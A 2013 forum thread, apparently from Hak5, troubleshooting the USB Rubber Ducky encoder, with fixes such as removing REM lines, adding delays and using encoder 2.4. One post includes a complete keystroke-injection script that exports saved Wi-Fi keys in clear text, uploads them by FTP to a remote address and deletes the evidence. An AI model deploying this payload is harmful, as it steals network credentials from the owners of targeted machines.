j105rob Posted April 4, 2013 Posted April 4, 2013 Ubuntu 12.0.4 LTS JRE 1.7.0_17 Encoder 3.0.0 at the "Encoding Script" step of the encoder java pegs my CPU at 100% and never gets any further. The payload I am trying to encode is: http://forums.hak5.org/index.php?/topic/29001-payload-wi-fi-password-stealer-payload-with-http-upload-through-bitsadmin/ Any ideas? Quote
no42 Posted April 4, 2013 Posted April 4, 2013 Tried the encoder v2.4 (it might help identify the problem)? Quote
j105rob Posted April 4, 2013 Author Posted April 4, 2013 (edited) Works in 2.4 Edited April 4, 2013 by j105rob Quote
ApacheTech Consultancy Posted April 4, 2013 Posted April 4, 2013 Can you run the encoder in debug mode? ("--debug" argument). It should give you a stack trace. Can you also post the script you're using. Quote
j105rob Posted April 5, 2013 Author Posted April 5, 2013 Can you run the encoder in debug mode? ("--debug" argument). It should give you a stack trace. Can you also post the script you're using. I ran with the --debug before positing the initial question, it produced nothing, it just hung on the encoding step and pegged the CPU. Here is the code: REM #### win 7 bits upload wlan keys DELAY 1000 ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 CTRL-SHIFT ENTER DELAY 400 ALT y DELAY 400 STRING netsh wlan export profile folder=%USERPROFILE%\ key=clear ENTER DELAY 200 STRING copy /b /Y %USERPROFILE%\*.xml %USERPROFILE%\wipass.xml ENTER STRING echo put %USERPROFILE%\wipass.xml uploads/wipass.xml|ftp -A 192.168.100.115 ENTER DELAY 2200 STRING quit ENTER STRING erase /Q %USERPROFILE%\*.xml ENTER DELAY 200 STRING exit ENTER Quote
no42 Posted April 5, 2013 Posted April 5, 2013 (edited) try removing line 1 - REM ... and re-encode. I think that might cause the DoS. Edited April 5, 2013 by midnitesnake Quote
dunce Posted April 8, 2013 Posted April 8, 2013 try removing line 1 - REM ... and re-encode. I think that might cause the DoS. Thanks, I was having the same issue and removing all comment lines allowed the script to encode in version 3.0.0. Quote
ctbram Posted April 18, 2013 Posted April 18, 2013 I was having the same problem and removing the REM lines allowed it to complete the encoding. But now I have another issue. I copied the inject.bin to the root of the ducky sd card and put it into the ducky. When I insert the ducky is installs drivers then pops up a gui saying insert disk dell aio (x) which is a removable drive on my usb printer and it does not run my script??? The script is simple... GUI r DELAY 200 STRING notepad.exe DELAY 500 STRING Hello World! ENTER Does it matter if I compile with the 64bit or 32bit java? I think the default path is going to point me at the 64bit one. Quote
no42 Posted April 18, 2013 Posted April 18, 2013 Probably down to the current VID/PID identifies of the default duck. Get the VID and PID of your USB Keyboard and clone these onto the Duck, shouldnt ask for drivers as they're already installed. Quote
ctbram Posted April 18, 2013 Posted April 18, 2013 well I am getting a bit disappointed with this ducky. I cannot even run this script... GUI r STRING notepad.exe ENTER DELAY 500 STRING Hello World! ENTER I mean SERIOUSLY can it get any simpler! First I blew several hours because the encoder hangs if you have a REM statement at the start of the txt file! Now I can get it to compile but it will not complete the GUI r / STRING notepad.exe / ENTER sequence! If I try it I get the pop up about mounting drive x. If I open notepad before inserting the ducky I see the Hello World! But not the notepad.exe so it appears to be getting consumed but never launches notepad! So at this point I don't know if the 3.0 encoder is borked, or the ducky is borked. All I know is if I cannot run a 6 line script this thing is JUNK! Quote
no42 Posted April 18, 2013 Posted April 18, 2013 (edited) What firmware are you running, have you followed the FAQ or the Draft Ducky Guide. Looks like you have read neither, and havnt even bothered to read the previous forum posts or tutorials. You need an initial delay as the Ducky fires straight away. You need further delays to wait for the OS to catch up with the Ducky DELAY 3000 GUI r DELAY 400 STRING notepad.exe ENTER DELAY 400 STRING Hello World! ENTER Use encoder v2.4 which is stable (v3.0.0 is experimental its only for testing purposes not general use). If there is any thing in the tutorials / FAQ /Guide you want? either speak up, or please make one yourself, this project is entirely community driven. And welcomes feedback and patches. Your Ducky is not borked - as its obviously working, the problem is obviously the flow of information and we need to present it better! Edited April 18, 2013 by midnitesnake Quote
ctbram Posted April 19, 2013 Posted April 19, 2013 Thanks for the replay I realized it had something to do withthe delays but I got the code from the wiki so I assumed it was valid. I just got the device and I have glanced at the FAQ and wiki guide. I just wanted to try something simple to see the device in action. I was concerned that if this could not handle such a simple script that it would never handle anything complex. Oh and I did add 3 sec (3000ms) delays and got very sporadic results so I am still on the fence. I will give the 2.4 encoder a shot and play with it more this weekend. Quote
ctbram Posted April 19, 2013 Posted April 19, 2013 Eureka! encoder 2.4 works perfectly. just a little feedback... I do like the output you get from the 3.0.0 version. I can't seem to get --debug to work in either version in 3.0.0 it encodes but I get no stack dump in 2.4 it does not encode and I get the default encode output. I have not read the 2.4 docs yet though so maybe the tag is not supported. Doing to read the docs now that I am getting consistent predictable results. Thanks again for the reply. Quote
no42 Posted April 19, 2013 Posted April 19, 2013 Ok, Now I need to know: Firmware version of the duck Encoder version your payload your encoder command any output from the encoder your language. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.